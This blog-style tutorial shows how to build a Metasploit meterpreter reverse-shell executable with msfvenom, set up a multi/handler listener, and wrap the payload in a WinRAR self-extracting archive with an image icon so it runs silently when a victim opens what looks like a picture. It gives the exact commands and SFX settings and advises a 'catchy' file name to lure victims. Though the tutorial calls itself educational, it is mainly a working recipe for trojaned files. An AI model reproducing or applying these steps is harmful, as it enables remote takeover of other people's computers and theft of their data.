Hide Payloads Behind Images.
This is only for Educational Purposes.
What is a Payload?
Well, a payload can be considered to be somewhat similar to a virus. A payload is a set of malicious codes that carry crucial information that can be used to hack any device beyond limits that you can’t imagine. … Generally, a payload refers to a set of codes which a hacker designs according to his/her requirements.
In the world of malware, the term payload is used to describe what a virus, worm or Trojan is designed to do on a victim’s computer. For example, payload of malicious programs includes damage to data, theft of confidential information and damage to computer-based systems or processes.
A payload is a custom code that attacker want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system
What is msfvenom ?
It is a function coming to us with the metasploit framework. According to the rapid7 blog,
The Metasploit Framework has included the useful tools msfpayload and msfencode for quite sometime. These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules. Now I would like to introduce a new tool which I have been working on for the past week, msfvenom. This tool combines all the functionality of msfpayload and msfencode in a single tool. Merging these two tools into a single tool just made sense. It standardizes the command line options, speeds things up a bit by using a single framework instance, handles all possible output formats, and brings some sanity to payload generation.
How to get this worked?
First of all you must have Kali Linux operating system. As a virtual environment or stand alone dual boot environment. Then start up the terminal. Metasploit framework is coming with the Kali Linux as a default tool. So we don't have to download it from other repositories. Then fire up the terminal and create the .exe file with the payload attached to it.
Then, type ifconfig on the console and find out the host IP address.
Then we have to fire the msfvenom and create the exploit included .exe file with this command.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe -o /root/Desktop/testviruse.exe
Here we set the local host as my Kali Linux IP address and listening port as 4444. The file type is .exe and the exploit added to the .exe file is reverse_tcp and the file name is testviruse.exe
What is reverse_tcp ?
The reverse_TCP is a type of meterpreter reverse shell. There are two types of attacks primarily, direct attacks or client-side attacks. So meterpreter will give you options of BIND Shell or REVERSE Shell. Reverse Shell is more likely to pass through firewalls, as the client/ victim will make the connection back to the attacker. You will have to set up a listener on the attackers machine and whenever client PC will connect, you will have a meterpreter session.
After that we have to fire up the Metasploitable console. I am dragging and dropping the .exe file in to my windows workspace. Thats where the Windows Defender comes into play. For testing purposes I disable the antivirus program manually.
Now drag and drop works. After that lets move to the msfconsole in Kali.
First we have to set the settings up and make ready to listening. We have to go in to the handler folder here.
use multi/handler
Our exploit is in that location.
set payload windows/meterpreter/reverse_tcp
We have to set the payload again to reverse_tcp for continue. Then we can set the LHOST and LPORT (Listener host IP address and port).
set LHOST 192.168.1.103
set LPORT 4444
Then we have to set the exitonsession boolean function value to false. setting this to 0 will result in a session that will never timeout, which has some interesting uses It will keep connecting back using the connection to the HTTPS endpoint. Then We can start the exploit by typing simply exploit -j. Because the handler can continue running as a job, even in the case of a closed, or failed meterpreter session. It only applies to jobs(-j) as these are the only ones that run in the background.
set exitonsession false
exploit -j
Them i am moving into windows to make the executable file hidden inside an image. First of all download or get any kind of picture you like and convert that picture as an icon using an online tool.
After that select the size of the icon to 256 * 256 and click on Convert ico and download the icon.
Then we have to select both picture (not the icon) and the payload filled .exe file and create an achieve with winrar with some customizable settings.
Inside the archive select any name you want, (Be tricky and try to add a catchy name). and select the compression method to best and tick on the Create SFX archive option. It is a must be done thing to have a result we want.
Then move into Advance options on rar window and select SFX options.
Select Update module and select the extract mode to Extract and update files and select Overwrite method to overwrite all files.
Then move into setup module and set the execution order as wanted.
In my case i want to execute my malicious file first and open the image second. So I typed,
testvirus.exe
raw.png
This raw.png is the name of my Image file. Ok, then we have to assign the icon that we created for this executable file. Select the Text and Icon module and load the SFX icon from the file. (last option)
Then select OK and go to previous window and create the file.
Here you can see the final executable file and the other files i used for create the executable one. And that’s all After the victim double click the file magic is happening on msfconsole.
Like that, a session is created. Lets see the details, try and open a shell on the victims browser.
This is what the info look like. there are 2 users that are logged in. one is authorized me and other one is unauthorized me. :) Lets open a shell.
A shell it created. easy as that. Lets see whats in my desktop. ;)
So as that I hacked my own machine. But I switched off the defender. Lets see what will happen when I enable it. Session Dies. So that’s why it is a good habit that let the windows update himself when asking..
There are other ways, there will be more zero day vulnerabilities Waiting be founded. But the thing is privacy is a myth.